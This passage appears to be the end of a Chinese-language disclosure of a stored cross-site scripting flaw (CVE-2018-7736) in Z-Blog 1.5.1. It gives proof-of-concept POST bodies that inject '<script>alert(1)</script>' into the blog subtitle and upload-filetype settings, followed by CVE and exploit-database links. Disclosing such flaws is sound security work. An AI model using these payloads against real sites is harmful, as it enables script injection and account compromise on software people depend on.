ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
 

ZC_UPLOAD_FILETYPE参数poc代码:

post_data:
 
ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek"><script>alert(1)</script>ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/23/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7736
exploit-db:https://www.exploit-db.com/exploits/44406/
MISC:https://packetstormsecurity.com/files/147066/Z-Blog-1.5.1.1740-Cross-Site-Scripting.html